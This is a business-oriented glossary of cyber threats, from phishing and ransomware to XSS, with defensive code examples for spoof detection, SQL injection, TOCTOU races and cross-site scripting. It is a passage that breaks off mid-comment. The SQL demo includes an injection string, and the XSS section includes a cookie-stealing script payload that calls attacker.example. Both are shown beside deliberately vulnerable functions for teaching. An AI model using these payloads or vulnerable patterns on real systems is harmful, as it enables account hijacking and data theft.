How to Recognize This Threat: Phishing emails initially appear to be official, but can usually be spotted on closer examination due to slight variations in “From” addresses, typos within the text, or graphics that don’t look quite right. They often include links and attachments to deliver malware.
How to Prevent This Threat: As a general practice, email recipients should not directly click links within email messages and be especially wary of downloading attachments. Organizations should train users to spot phishing emails and avoid interacting with them. For the best protection, email security appliances and subscriptions are designed to stop phishing and the many other threats that might come through email.
Potentially Unwanted Applications (PUA)
What are Potentially Unwanted Applications (PUA)?
In this case, the name Potentially Unwanted Applications (PUA) is fairly self-explanatory. Also known as Potentially Unwanted Programs (PUPs), they are programs that may create security concerns and be unsuitable for use in a networked business. Unlike many other items on this list, these are generally not malicious programs in and of themselves, but they can open the door for problems.
How to Recognize This Threat: Examples of PUA include remote admin tools, adware, and vulnerability scanners. A computer with many of these applications can suffer from performance issues.
How to Prevent This Threat: Administrators can set policies requiring privileges for users to load software on their computers, which can keep PUAs off of your network. But if some may already be there or get through some other way, endpoint security solutions can detect and report PUAs to help eliminate the threat they pose.
Process Privilege Escalation
What is Process Privilege Escalation?
Process Privilege Escalation is an exploit technique that involves a hacker gaining elevated access to resources and administrative authority by enhancing their privileges. There are two common types of privilege escalation: vertical and horizontal. Vertical privilege escalation involves a user accessing files or functions that are normally associated with accounts that have higher privileges. Horizontal privilege escalation allows users to access resources in other accounts with similar privilege levels as they have.
How to Recognize This Threat: Any network with several users can be vulnerable to this type of attack.
How to Prevent This Threat: Limit privileges only to users who need them. The fewer users who have administrative privileges, the tougher it is for hackers to successfully gain top access through this attack. The experts at Firewalls.com can help you prioritize user access privileges with Access Control through Custom Security Solutions.
What does it mean to Quarantine malware?
Quarantine is a technique used by anti-virus and anti-malware software to isolate infected files on a computer. Files identified by this software can include viruses and worms, as well as system files that have been infected.
How to Recognize This Threat: The user may be prompted by anti-virus/anti-malware software with an option to quarantine, clean, or delete identified files.
How to Prevent This Threat: Choosing the quarantine option places the infected file under the control of the anti-virus/anti-malware program, keeping it from further affecting a user’s system. Deleting a file altogether could cause problems if it is a system file that was infected by malware – in which case cleaning the file is a safer option. Ensure your users have a service that detects viruses and malware, giving them the option to clear their computer from infection. Get endpoint protection for your network.
What is Ransomware?
Ransomware is a type of malware that is meant to hold a user or organization for ransom. It may simply deny access to files or could even destroy data if a financial payout is not provided to the hacker who planted it.
How to Recognize This Threat: A computer with ransomware will receive a message that a type of ransom is required to access files that were previously accessible. Typically, those files are locked behind a password that is promised if the ransom is paid. Ransomware is often set to expand across a network if the infected computer is part of a larger organization.
How to Prevent This Threat: As with any malware, users should take care not to download suspicious files or click suspicious links. To protect your organization, ensure you have a firewall with a full suite of security services continuously updated. See your options from the top brands in the industry.
Remote Access Trojan
What is a Remote Access Trojan?
A Remote Access Trojan (or RAT) is an application that allows hackers back door administrative access to a computer. RATs, also known as Creepware, are usually downloaded either as an invisible add-on with software the user chooses to access, such as a game, or it may be sent as an email attachment. Once on a computer, the hacker has almost unfettered access to the system and can use it to spread malware to others, spy on the user, or download and delete files.
How to Recognize This Threat: RATs can be tough to identify in action as they typically do not show up on Task Manager. There may be unusual activity on the computer, but hackers behind these trojans often avoid heavy usage, making them difficult to detect.
How to Prevent This Threat: As with any downloadable malware, users should avoid downloading any suspicious attachments or clicking links they are unsure of. Network administrators should ensure all antivirus/antimalware subscriptions are active and updated, and that their firewalls are optimally configured. Ensure your configuration is at its best by having the experts at the Firewalls.com Security Operations Center handle it for you.
Remote Code Execution
What is Remote Code Execution?
Remote Code Execution (RCE) describes a type of attack in which an attacker is able to run arbitrary commands or code on a target machine. This vulnerability enables attackers to execute malicious code to take control of affected devices with escalated privileges. This type of attack is almost always performed by an automated script and often aims to provide administrative access to attackers. Once a system is compromised, attackers are able to access any information on the compromised network.
How to Recognize This Threat: In most RCE exploits, attackers do their best to hide their presence on the network. Remote Code Execution is often used to gain a foothold from which to launch further attacks.
How to Prevent This Threat: Patching your systems with the latest security updates is key to preventing Remote Code Execution exploits. Because RCE is a broad and flexible class of vulnerability, prevention includes vigilantly fixing holes that allow attackers to gain access to the network.
What is REvil Ransomware?
REvil Ransomware, also known as Sodinokibi, is another strain of ransomware that infects a system or network, encrypts files, and demands a ransom to decrypt them. The ransom demand doubles if the victim fails to pay by the first deadline. REvil is among what’s known as ransomware-as-a-service (RaaS), which involves one group coding the ransomware, while others distribute it.
How to Recognize This Threat: Like other ransomware, a victim of REvil receives a message that the ransom is required to access files that were previously accessible. As far as how it spreads, unlike more targeted varieties, RaaS ransomware types are typically spread more widely, through phishing emails and infected attachments.
How to Prevent This Threat: Also like other ransomware, protecting against a REvil attack is multi-faceted. Educate employees to avoid suspicious links and attachments. Maintain regular backups of your files so you can restore them if they’re encrypted. And employ a next generation firewall with real-time security services that feature sandboxing, machine learning, signature-less defenses, and more to detect and stop ransomware before it strikes.
Rogue Access Point
What is a Rogue Access Point?
A rogue access point (or AP) is any wireless access point that is installed on a network without authorization and is thereby not managed by the network administrator. Rogue APs then do not have the same security setup as other access points. They are especially dangerous as they are physically installed behind a network firewall, meaning someone who gains access to the AP can get access to the broader network. Rogue APs may be installed maliciously by an attacker or simply by an employee looking for their own special wifi access and could be plugged directly into a firewall or network switch, a wall connection, or even other network devices. Regardless, rogue access points may be used for a variety of attacks, including denial of service, data theft, and other malware deployment.
How to Recognize This Threat: A visual inspection of network devices like firewalls and switches can identify an access point that doesn’t belong, but for better visibility, conduct regular scans of your wireless air space, as rogue access points won’t show up over the wire.
How to Prevent This Threat: A Wireless Intrusion Prevention System (WIPS) such as the one offered through WatchGuard can detect and stop rogue APs. A managed network switch is preferable to an unmanaged one, as someone attempting to plug in an access point to a random unused port will not gain access if the device is properly configured. Ensuring logging is enabled can also help identify suspicious activity. And if an employee is responsible for setting up a rogue AP, ensure proper training is in place with policies that discourage this practice. Regardless of how rogue APs are identified, ensure they are addressed as soon as possible.
What is a Rootkit?
A Rootkit is software that helps disguise the presence of malware by hiding programs or processes running on a computer. It is frequently installed with malware and can cover up applications such as keyloggers and password sniffers, as well as signs that a hacker has taken control of the device.
How to Recognize This Threat: You may notice your computer running especially slow. You may also come across a never-before-seen application when checking your Task Manager. If you discover a Rootkit, that means some further nefarious activity is occurring on your system.
How to Prevent This Threat: Endpoint security products have evolved to detect and remove rootkits when scanning for malware. Check out excellent options to secure the endpoints on your network from SonicWall and Sophos.
What is Shellcode?
Shellcode is a special type of code injected remotely which hackers use to exploit a variety of software vulnerabilities. It is so named because it typically spawns a command shell from which attackers can take control of the affected system.
How to Recognize This Threat: You likely will not notice shellcode until you have noticed an attack on the computer.
How to Prevent This Threat: The best way to avoid encountering shellcode on your network is to protect it with a strong firewall accompanied by security services. See your options from the top brands in the industry.
What is Smishing?
Smishing refers to a type of phishing that occurs via text message. The reason for the different beginning? SMS stands for short message service, another way to refer to a text message, and thus the name smishing replaces phishing. Regardless, other than the difference in how it’s received – email vs. text message – the attack concept is the same. An attacker may include a malicious link in a text message that will either release/download malware immediately when clicked, or lead to a form to steal someone’s personal information.
How to Recognize This Threat: A smishing attack will typically come from an unknown number, so that is an initial red flag. Often, that unknown number may not be a real phone number, rather just a few digits. Even still, the message may claim to be from a reputable company or institution. But know that banks and credit card companies will not solicit personal information via text.
How to Prevent This Threat: In short, don’t click anything in a text message unless you are sure of its origin. If you receive a message from a bank, store, or credit card provider that you do normally work with, confirm its origin another way – either by calling a known customer service number or via direct website contact. Keep sensitive information off of your phone as much as possible as well, so there’s little for an attacker to gain. And secure your business phones with mobile endpoint protection, such as Sophos Mobile Advanced.
What is Social Engineering?
Social Engineering references the methods hackers employ to trick users into giving up sensitive information, whether it be by volunteering the information through an email, filling out a fraudulent web form, or downloading malware via an attachment or bad link. Social Engineering is how hackers get the user to behave as they want, usually through tricks.
How to Recognize This Threat: Users should look for email offers that are too good to be true, like a Nigerian Prince providing $1 million if he receives bank account information, or any email that asks to confirm a username, password, credit card, etc. They could be from official looking sources, but users should examine these messages closely and think twice before clicking links, downloading attachments, or sharing information.
How to Prevent This Threat: Vigilance among users is key, knowing how to recognize suspicious messages and not immediately acting without checking their veracity. A strong email security appliance, like the ones offered by Barracuda, can help keep many of these messages from getting through in the first place, while also protecting your network against a user making the wrong move.
What is Spam?
Unlike the ham-like product sold in cans on store shelves, Spam in the online world is unwanted, unsolicited email, usually sent en masse. Much like traditional junk mail that comes to your home mailbox, it often represents sales content. Spammers often use legitimate email addresses to evade anti-spam software. While the emails themselves are often not harmful, they can be used to distribute malware. And the non-harmful emails can still fill up databases, waste staff time, and lead to overlooked legitimate messages due to spam confusion.
How to Recognize This Threat: Most email clients have some type of spam or junk email filter that will identify obvious bulk email, but some messages still get through. If a message contains an ad that you have not asked to receive or seems impersonal, it is likely spam. Harmful spam may also contain suspicious links or attachments, and include typos.
How to Prevent This Threat: As always, training staff to look for the signs of spam is important. And in addition to any out-of-the-box spam filters your email client may have, to secure your organization, look to SonicWall’s email security and anti-spam as an added layer of protection.
What is Spearphishing?
Spearphishing is a targeted email attack that goes after individual victims, such as employees within a business. A hacker will reach out to employees via a phony email (often meant to appear to come from within the organization) to attempt to steal proprietary information or money. Human Resources and Accounting teams are often targeted due to their access to sensitive data, while at the same time, HR and IT departments are often those spoofed as employees are more likely to believe requests from them.
How to Recognize This Threat: Look for unusual requests made via email, such as requests to confirm a username or password, or to provide other sensitive information outside of normal protocol. Spearphishing attacks often include bogus links, so examine any links closely before clicking on them.
How to Prevent This Threat: Train employees to look for the signs of an attack and develop protocols for any release of sensitive information. To protect your network, ensure email security is in place to flag messages that come from outside the organization while also monitoring for suspicious language, links, or attachments in emails.
What is Spoofing?
When spoofing, a hacker forges the sending address of an email for the purpose of a social engineering attack. Users receiving a spoofed email are more likely to open attachments (which could contain malware) or voluntarily share sensitive information (as in a phishing attack) when they believe they know the sender. Commonly spoofed accounts include banks and online stores, in addition to those within a business. Spoofing may also refer to websites, when a bad actor copies the look of a legitimate website – often with a slight variation of its URL – also for malicious purposes.
How to Recognize This Threat: The sender name may be changed, but the address may not, so cross-check both if you are initially suspicious. Also double-check the return path of the message, and look for typos or other style issues that would not normally be included in a legitimate email.
How to Prevent This Threat: An important line of defense is teaching users on your network to be on the lookout for signs of spoofed messages. But to ensure your security, check out email security and anti-spam solutions from SonicWall or Barracuda’s email security offerings.
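The manual checks this entry and the Phishing entry recommend (compare the display name with the real sending address, double-check the Return-Path, watch for slight variations in the sender’s domain) can be automated as a first-pass triage on incoming mail. The following is an added Python example, not code from Firewalls.com or any vendor named on this page; the message headers, the trusted-domain list, and the similarity threshold are constructed for illustration and would be tuned to your own environment.

```python
import difflib
import email
import re
from email.utils import parseaddr

# Domains this organisation treats as its own or as known partners
# (constructed list for the example).
TRUSTED_DOMAINS = {"examplebank.com", "example.com"}

# Constructed sample: display name claims one address, the real one differs,
# the sending domain is one letter off, and replies/bounces go elsewhere.
SPOOFED = """\
Return-Path: <bounce@mailer-x.example>
From: "Example Bank Support <support@examplebank.com>" <alerts@exannplebank.com>
Reply-To: <verify@reply-collector.example>
To: user@example.com
Subject: Confirm your account

Your account has been limited. Please confirm your details.
"""

# Constructed sample of a legitimate notification for comparison.
LEGITIMATE = """\
Return-Path: <alerts@examplebank.com>
From: "Example Bank" <alerts@examplebank.com>
To: user@example.com
Subject: Your monthly statement is ready

Your statement is available in online banking.
"""


def domain_of(addr):
    """Lower-cased domain part of an address, or '' when there is none."""
    return addr.rpartition("@")[2].lower() if "@" in addr else ""


def lookalike_of(domain, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain this one closely resembles, if any.
    A ratio of 0.8 catches one- or two-character swaps in short domains."""
    if not domain or domain in trusted:
        return None
    for t in sorted(trusted):
        if difflib.SequenceMatcher(None, domain, t).ratio() >= 0.8:
            return t
    return None


def spoof_indicators(raw_message):
    """Return a list of indicator codes found in the message headers.
    Each is a red flag for a human to review, not proof of spoofing on its own
    (bulk mailers, for instance, legitimately use a different Return-Path)."""
    msg = email.message_from_string(raw_message)
    findings = []
    display, addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(addr)

    # 1. Display-name spoofing: the visible name embeds an address whose
    #    domain is not the domain the mail actually came from.
    m = re.search(r"@([A-Za-z0-9.-]+)", display)
    if m and m.group(1).lower() != from_dom:
        findings.append("display_name_mismatch")

    # 2. Look-alike sending domain (slight variation of a trusted one).
    la = lookalike_of(from_dom)
    if la:
        findings.append(f"lookalike_domain:{la}")

    # 3. Return-Path (where bounces go) does not match the From domain.
    rp_dom = domain_of(parseaddr(msg.get("Return-Path", ""))[1])
    if rp_dom and rp_dom != from_dom:
        findings.append("return_path_mismatch")

    # 4. Reply-To sends the victim's answer somewhere else entirely.
    rt_dom = domain_of(parseaddr(msg.get("Reply-To", ""))[1])
    if rt_dom and rt_dom != from_dom:
        findings.append("reply_to_mismatch")

    return findings


if __name__ == "__main__":
    print("spoofed:   ", spoof_indicators(SPOOFED))
    print("legitimate:", spoof_indicators(LEGITIMATE))
```

The indicators deliberately stay independent of each other so a mail gateway rule can weight them; in practice they sit alongside SPF, DKIM, and DMARC results, which this example does not evaluate.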
What is Spyware?
Spyware is software that allows hackers, or even advertisers, to gather sensitive information from you without your permission. Users often get spyware by visiting certain websites, either as an automatic software download that occurs without their knowledge or by answering a popup prompt.
How to Recognize This Threat: A computer infected with spyware will likely run slower or even crash, as it consumes memory and processing capacity. You may notice unusual processes running in the background as well.
How to Prevent This Threat: Antivirus and endpoint security solutions are key to stopping spyware in its tracks. And there’s no better endpoint protection than Sophos Intercept X with EDR.
What is an SQL Injection?
An SQL (structured query language) Injection is an exploit that sends commands via a web server to an SQL database to extract personal data or deliver other malware. If the server that houses the database is not designed correctly, a command placed in a form field could then be executed, for instance calling for the database to output customer data.
How to Recognize This Threat: Web application scans and routine database audits showing the presence of questionable HTML tags or suspicious IP addresses may be able to detect that this type of attack has occurred. Web forms tend to be among the most vulnerable and most targeted.
How to Prevent This Threat: These regular scans can provide recommendations on how to fix SQL vulnerabilities. The best ongoing protection for your website though, is a Web Application Firewall. See your options from SonicWall and Barracuda.
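The sentence above about a command placed in a form field being executed comes down to one coding mistake: building the SQL text by pasting user input into it. The example below, added here and not code from Firewalls.com or from any vendor on this page, shows that mistake beside the fix (parameterized queries) against a constructed in-memory SQLite customer table; the same placeholder mechanism exists in every mainstream database driver.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for a site's customer table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (email, card_last4) VALUES (?, ?)",
        [("alice@example.com", "1111"), ("bob@example.com", "2222")],
    )
    return conn


def lookup_vulnerable(conn, email):
    """Vulnerable: the form value is spliced into the SQL text, so the database
    cannot tell where the command ends and the data begins."""
    sql = f"SELECT email, card_last4 FROM customers WHERE email = '{email}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, email):
    """Hardened: the value travels separately from the SQL text via a
    placeholder, so it is only ever compared as a string, never executed."""
    return conn.execute(
        "SELECT email, card_last4 FROM customers WHERE email = ?", (email,)
    ).fetchall()


def demo():
    """Run both versions with an ordinary value and with the textbook
    tautology an audit would test for; return the row counts."""
    conn = make_db()
    normal = "alice@example.com"
    crafted = "x' OR '1'='1"
    return {
        "vulnerable_normal": len(lookup_vulnerable(conn, normal)),
        "vulnerable_crafted": len(lookup_vulnerable(conn, crafted)),
        "safe_normal": len(lookup_safe(conn, normal)),
        "safe_crafted": len(lookup_safe(conn, crafted)),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s)")
```

With the crafted value the vulnerable lookup dumps the whole table while the parameterized one correctly finds no customer with that literal e-mail address, which is the behaviour a web application scan is checking for when it reports an injectable form field.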
Supply Chain Attack
What is a Supply Chain Attack?
A supply chain attack is a type of cyber attack that targets an often less secure third party organization to gain access to a different target or targets. Hackers may plant various malicious code in a third party business that interacts with typically larger, more secure targets and has access to that target’s systems as part of its day to day business.
In essence, by compromising one weak link in a supply chain, attackers potentially gain access to all of that organization’s clients. Other variations could involve simply breaching the less secure organization and stealing clients’ data directly from them.
How to Recognize This Threat: A supply chain attack can affect any type of organization, including financial firms, retailers, and governments to name a few. The SolarWinds attack of 2020 is a recent example, in which attackers planted malicious code in a software update that went out to thousands of SolarWinds’ customers. This then created a method for attackers to access its clients’ data systems. Hackers used the opening to spy on thousands of organizations, from U.S. government agencies to cybersecurity firms. A past high profile example was the Target breach of 2013.
How to Prevent This Threat: Stopping a supply chain attack requires more than simply strengthening your own network’s security protocols. Organizations must be acutely aware of any partners and ensure only those completely essential to operations have access to their data. And beyond that strict access control, organizations should collaborate with partners to ensure there are no weak security links in a supply chain.
What is a Time-of-Check-Time-of-Use attack?
Time-of-Check-Time-of-Use (TOCTOU) attacks fall under the category of a race condition (which occurs when two or more operations that should be done in sequence are attempted simultaneously). A hacker is able to access a file and make harmful changes between the time of check (first time the program accesses the file) and the time of use (when the software uses the file). The opportunity window is very short due to that near simultaneous overlap.
How to Recognize This Threat: Shared files that multiple users can access are susceptible to TOCTOU issues. A file that has been corrupted could cause a system crash or corrupt data related to the file.
How to Prevent This Threat: Ensure your network has processes in place to avoid race conditions, such as prioritizing file access so that only one user can edit the file at a time. Firewalls.com Security Operations Center experts can help. Learn about getting your firewall professionally configured.
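On the software side, the window between "check" and "use" disappears when the program checks the file it has actually opened rather than the path name. The example below is added here and is not code from Firewalls.com: it shows the check-then-use pattern beside the open-then-verify fix, with a hook standing in for the racing process that swaps a shared file for a symbolic link. The file names are constructed, and the code assumes a POSIX system (O_NOFOLLOW is not available on Windows).

```python
import os
import stat
import tempfile


def read_regular_file_vulnerable(path, between_check_and_use=None):
    """Check-then-use: lstat() says 'regular file', then open() is a separate
    call on the same path. Whatever the path points to by then is what gets
    read, so a swap in between defeats the check."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return None
    if between_check_and_use:          # stands in for a concurrent writer
        between_check_and_use()
    with open(path, "rb") as f:        # plain open() follows symlinks
        return f.read()


def read_regular_file_safe(path, between_check_and_use=None):
    """Open first, then check the object actually opened via its descriptor.
    O_NOFOLLOW makes open() refuse a symlink, and fstat() describes the open
    file rather than the path, so there is no window between check and use."""
    if between_check_and_use:          # a swap can only happen before open()
        between_check_and_use()
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:                    # e.g. ELOOP: the path is a symlink
        return None
    with os.fdopen(fd, "rb") as f:
        st = os.fstat(f.fileno())
        if not stat.S_ISREG(st.st_mode):
            return None
        return f.read()


def demo():
    """Constructed scenario: a shared report file is replaced by a symlink to
    a file the reader must never hand out. Returns what each version read."""
    with tempfile.TemporaryDirectory() as d:
        shared = os.path.join(d, "report.txt")
        protected = os.path.join(d, "protected.txt")
        with open(protected, "w") as f:
            f.write("protected contents")

        def reset():
            if os.path.lexists(shared):
                os.remove(shared)
            with open(shared, "w") as f:
                f.write("harmless report")

        def swap():                      # what the racing process would do
            os.remove(shared)
            os.symlink(protected, shared)

        reset()
        leaked = read_regular_file_vulnerable(shared, swap)
        reset()
        blocked = read_regular_file_safe(shared, swap)
        return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("check-then-use read:", leaked)
    print("open-then-verify read:", blocked)
```

The vulnerable version returns the protected file's contents even though its check passed; the hardened version returns None because the open call itself rejects the swapped-in link. Passing the already-open descriptor to whatever uses the file, instead of re-resolving the path, is the general form of this fix.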
What is a Trojan?
A Trojan – also known as a Trojan Horse – is a malicious program disguised as legitimate software. The harmful functions it carries out are often hidden, whether they be infecting a device with a virus or stealing personal information. Trojans are often used to carry out ransomware attacks.
How to Recognize This Threat: Trojans often find their way onto computers due to a user’s decision to click an ad or download an attachment. Examples to be wary of are video codecs or game downloads with unclear sources. They may also come with pirated software.
How to Prevent This Threat: Ensure any software your users download is from an official source. Train them to look for and avoid suspicious links. To protect your network from having one slip through, get the latest in firewall and security services subscriptions.
What is a URL Injection?
URL Injection occurs when a hacker has created/injected new pages on an existing website. These pages often contain code that redirects users to other sites or involves the business in attacks against other sites. These injections can be made through software vulnerabilities, unsecured directories, or plug-ins.
How to Recognize This Threat: Google’s Search Console will flag potentially injected pages with a message sent to the website administrator. The admin can then search the full site for new pages that have been added. In other cases, organizations may only become aware of the issue when their page ranking drops via web and search analytics.
How to Prevent This Threat: Once the bad pages are found and accessed without the normal browser, the site administrator can remove them, remove the functions the hacker used to create them, or restore affected directories with a previously saved version. To prevent it from occurring again, though, site vulnerabilities must be addressed. Web Application Firewalls can provide comprehensive protection against hackers. Protect your site with SonicWall or Barracuda WAFs.
Use After Free (UAF)
What is a Use After Free bug or vulnerability?
Use After Free (UAF) refers to a memory corruption bug that occurs when an application tries to use memory that is no longer assigned to it (it has been freed) and may since have been reassigned to another purpose. This can cause crashes and data to be inadvertently overwritten, or in cyber attack scenarios can lead to arbitrary code execution or allow an attacker to gain remote code execution capabilities. Use after free vulnerabilities have often been associated with web browsers such as Google Chrome and Mozilla Firefox, enabling multiple successful attacks over a number of years.
How to Recognize This Threat: Use after free vulnerabilities are not easy to find – they are typically found and exploited by savvy individuals with a software development background or knowledgeable attackers. Actual/active exploits are often the method for gaining awareness into specific vulnerabilities.
How to Prevent This Threat: Error-free code is a key, but most aren’t involved in that particular aspect of their software and operating systems. So on a broader scale, keeping your browser updated with the latest patches is likely your best form of protection. And of course, for any security scenario, strong end user protection is vital to heading off exploits that haven’t yet been patched. Check out options from Sophos and SonicWall.
What is a Virus?
Viruses are harmful, malicious programs that can spread to other files. They can spread in a number of ways, including via an internet download, opening an email attachment, or connecting physical media to a device. Viruses can range from annoying – displaying messages or pop-ups – to devastating – stealing data or making your computer unusable.
How to Recognize This Threat: An infected computer’s performance can slow significantly, booting up at a snail-like pace. The computer may begin displaying ads or other pop-ups. It may also be running with heavy background activity while the user is not active.
How to Prevent This Threat: Aside from teaching employees to be careful where they click, an organization should have the latest antivirus protection active on its network. Continuously updating antivirus protection is just part of the suite of services through a FortiGuard Security Subscription, available with FortiGate firewalls.
What is a Vulnerability?
A Vulnerability is a flaw or bug in a software application that can be exploited by hackers. Vulnerabilities are commonplace in the software industry with hackers continually looking for new ones to take advantage of.
How to Recognize This Threat: Companies often pay researchers to identify vulnerabilities, while others are not known until hackers exploit them. Businesses can also recognize vulnerabilities by staying abreast of the latest cyber security news.
How to Prevent This Threat: Users should ensure all software is kept up-to-date, enabling auto-updates when possible, as the latest security patches will be pushed automatically. Otherwise, firewalls complete with security services subscriptions can keep vulnerabilities from affecting your organization. Visit our Promos page for the latest deals on firewall bundles.
What is Wardriving?
Wardriving refers to the practice of searching for wireless networks while driving, using nothing more than a laptop or smartphone. It is a form of access point mapping with several variants named for the mode of transport, such as warwalking, warbiking, and wartraining. In any case, wardriving and its siblings let those doing it see all visible wifi access points in a given area.
How to Recognize This Threat: The act of wardriving is not technically illegal and doesn’t necessarily lead to individual breaches – as some do so passively. However, some do use the drive-by visibility of a wifi network outside of its designated zone to either steal internet access or worse, exploit a network. You may recognize it by sight if you see someone driving slowly outside your home or business equipped with a special antenna. Or, with the right visibility into your wireless network, you – or your network admins – may spot someone who doesn’t belong.
How to Prevent This Threat: Network visibility is a key starting point, but fully preventing someone from stealing access or data requires a strong security setup. This includes access points with built-in security. Ensure your protection meets the latest standard – WPA2 – and is turned on. Consider an upgrade if your setup has the legacy WEP encryption, which is far less secure. Also ensure your overall network has the added protection of a next generation firewall to prevent access to your broader network and data.
What is WastedLocker Ransomware?
WastedLocker Ransomware is a highly targeted type of ransomware typically used to attack large U.S. organizations. Once it infects a system, the ransomware creates encrypted filenames which include the term “wasted” and an abbreviation of the victim’s name. As with any ransomware, the goal is to infect a system or network, encrypt files, and hold them for ransom. WastedLocker is associated with the Evil Corp malware group. Unlike some forms, it initially has not been associated with exfiltration and auction of stolen data.
How to Recognize This Threat: As WastedLocker is highly targeted, it is also customized to surpass each target’s defenses. One common method to initially gain entry is the usage of a fake software update alert embedded in existing websites.
How to Prevent This Threat: WastedLocker is trickier than many ransomware variants in both its targeted nature and its ability to evade even behavior-based monitoring long enough to infect a system or network. Certainly one method to prevent the threat is to avoid clicking suspicious popups. Additionally, as with any ransomware, regular backups including offline backups of files can allow for quick restoration of encrypted information. And any security setup should cover multiple bases, including firewalls, email security, endpoint protection, and security service subscriptions.
What is a Watering Hole Attack?
A Watering Hole Attack involves hackers tracking websites frequented by employees of a targeted business or other organization and planting malware on a vulnerable one of those sites. The malware infects the user simply with a visit to the site (no special action by the user is required), and then remains on the computer to allow a hacker access to sensitive information about the employee’s workplace.
How to Recognize This Threat: The threat is hard to recognize, as it does not change the user experience on any given website. The only method to identify this threat is a suite of strong network security tools.
How to Prevent This Threat: As with any malware threat, the first step is to keep all software up-to-date to take advantage of the latest security patches. But to recognize and prevent watering hole attacks, an organization will need strong intrusion prevention systems (IPS) and other network security features available through a firewall with a security services subscription. And it just so happens SonicWall and Sophos are both offering their top-tier firewalls free with a three-year subscription.
What is Whaling?
Whaling is a type of spear-phishing (targeted email) attack that targets high-level victims, such as corporate leadership. A hacker will pose as a member of leadership and reach out to employees within the organization via phony email to attempt to steal proprietary information or money, as employees tend to be less likely to question a request coming from leadership. Human Resources and Accounting teams are often targeted due to their access to sensitive data.
How to Recognize This Threat: Look for unusual requests made via email, such as requests to transfer funds or provide sensitive information that are outside of normal protocol. Some whaling attacks may also use slightly different email addresses than the real ones or include a link outside the organization.
How to Prevent This Threat: Train employees to look for the signs of an attack and develop protocols for any release of sensitive information. Ensure executives keep personal information such as social media accounts private so that hackers cannot as easily pose as them. Email security can flag messages that come from outside the organization while also monitoring for suspicious language, links, or attachments in emails.
What is WiFi Eavesdropping?
WiFi Eavesdropping can involve a hacker stealing data while on a public, unsecured wifi network. The unsecured transmission of data allows for the theft of anything that’s unencrypted, from passwords to files to financial information (both personal and business-related). WiFi Eavesdropping can also be a more direct process, with hackers setting up a phony free network, made to look like that of an official business. Users who log in to the spoofed network are subject to the same potential theft of data. Finally, it can also occur if hackers are able to gain password access to a protected network.
How to Recognize This Threat: As a business operating a network, regular scans of available wifi networks can reveal whether a spoofed network is operating in your area. Users of public wifi can spot an unsecured network if there is no login required to have access.
How to Prevent This Threat: Users should confirm the validity of a network before connecting. Once on wifi, users can ensure their data is encrypted and difficult to access by using a virtual private network (VPN). Businesses can provide VPN access to their remote employees through a firewall, such as a SonicWall TZ300. A firewall is also the solution for a business offering wifi access, like one with built-in wifi, such as a FortiWiFi device.
What are Wiper Attacks?
A Wiper Attack involves wiping/overwriting/removing data from the victim. Unlike typical cyber attacks which tend to be for monetary gain, wiper attacks are destructive in nature and often do not involve a ransom. Wiper malware may however be used to cover the tracks of a separate data theft.
How to Recognize This Threat: If your network is the victim of a wiper attack, it likely won’t be covert. As wiper malware actively destroys data, it is not meant to linger quietly in the background.
How to Prevent This Threat: Networks should be segmented, with write access to crucial data limited to a select few accounts. Files should also be backed up to another location, and at least one copy should be kept offline or immutable so that malware running with a compromised account's permissions cannot overwrite it; test restores regularly, since a backup that has never been restored is only a hope. You likely already have a firewall set up, but keeping your network secure is a job that could use some support. The Security Operations Center experts at Firewalls.com can help with Customized Firewall Solutions.
What is XSS?
XSS stands for cross-site scripting, a type of injection attack in which a hacker gets a malicious script into content served by a trusted website. The hacker exploits a flaw in the trusted site, typically user-supplied input that is echoed into a page without being encoded, so that the malicious code is delivered along with the site's own dynamic content and executed by a victim's browser with the trust and session of that site. Traditionally, XSS has been known as a method for hackers to steal session cookies, allowing them to impersonate the victim online and use their private accounts, but an injected script can do anything the victim can do on that site. These attacks target the site's users rather than its servers.
How to Recognize This Threat: It can be difficult for a user to recognize an XSS attack, since the malicious script runs invisibly inside a page they trust; affected users who notice odd behavior will usually report it to the website where they encountered it. Web administrators are more likely to find the underlying flaw through routine vulnerability assessments and by reviewing logs for requests that carry script-like input.
How to Prevent This Threat: In addition to regular vulnerability assessments, secure coding is the real fix: validate input, and encode output for the context it is placed in (HTML body, attribute, JavaScript, URL) rather than trying to filter out "bad" characters. Mark session cookies HttpOnly so that script cannot read them, and deploy a Content Security Policy to limit what an injected script can do if encoding is ever missed. A security solution should also be in place, like a web application firewall, to protect your users' information and your organization's reputation.
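The vulnerable pattern and its fix, as an added example that is not code from the Firewalls.com page: a search page that reflects the user's query into both an HTML attribute and the page body, the same page rendered with output encoding, and the cookie and Content Security Policy headers that limit what an injected script can do. The payload, cookie value and nonce are constructed for the demo; the server framework is left out so the rendering functions can be run on their own.

```javascript
// Added example (not from Firewalls.com): reflected XSS sink, hardened rendering, and
// the headers that contain cookie theft. PAYLOAD and sample values are constructed.

// Vulnerable: untrusted input is dropped straight into an attribute and the body.
function renderSearchVulnerable(query) {
  return `<input value="${query}"><h1>Results for ${query}</h1>`;
}

// Classic cookie-theft payload (constructed). The leading "> closes the attribute
// and the input tag, so the script tag becomes live markup.
const PAYLOAD = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Encoder for HTML body and double-quoted attribute contexts. Encoding at output
// time leaves the stored value intact; other contexts (JavaScript, URL) need their own encoder.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened: the same page with every untrusted value encoded for its context.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<input value="${q}"><h1>Results for ${q}</h1>`;
}

// Demo check: does the rendered markup still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the cookie-theft case: HttpOnly keeps the session cookie out
// of document.cookie, Secure keeps it off plaintext HTTP, SameSite=Lax stops most
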